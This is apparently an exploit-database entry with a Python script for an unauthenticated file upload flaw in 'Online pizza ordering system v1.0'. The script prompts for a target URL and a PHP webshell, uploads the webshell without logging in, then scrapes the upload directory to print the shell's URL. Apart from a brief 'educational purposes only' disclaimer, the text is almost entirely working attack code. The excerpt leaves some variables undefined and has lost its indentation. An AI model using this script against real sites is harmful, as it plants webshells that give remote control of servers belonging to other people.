Exploits / Vulnerability Discovered : 2023-05-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Online pizza ordering system v1.0 unauthenticated file upload is for educational purposes only and if it is used you will do on your own risk!
# if no arguments are passed, ask the user for them
if not (args.url and args.payload):
args.url = input('Enter URL with http://: ')
args.payload = input('Enter file path PHP webshell: ')
# send a POST request to the server
resp_upl = requests.post(url, files = files)
status_code = resp_upl.status_code
if status_code == 200:
print('[+] File uploaded')
else:
print(f'[-] Error {status_code}: {resp_upl.text}')
raise SystemExit(f'[-] Script stopped due to error {status_code}.')
# send a GET request to the server
resp_find = requests.get(img_url)
# Use BeautifulSoup to parse the page's HTML code
soup = BeautifulSoup(resp_find.text, 'html.parser')
# get all <a> tags on a page
links = soup.find_all('a')
# list to store found files
found_files = []
# we go through all the links and look for the desired file by its name
for link in links:
file_upl = link.get('href')
if file_upl.endswith(filename): # uploaded file name
print('[+] Uploaded file found:', file_upl)
file_url = img_url + file_upl # get the full URL of your file
found_files.append(file_url) # add the file to the list of found files
# if the list is not empty, then display all found files
if found_files:
print('[+] Full URL of your file:')
for file_url in found_files:
print('[+] ' + file_url)
else:
print('[-] File not found')
Online pizza ordering system v1.0 unauthenticated file upload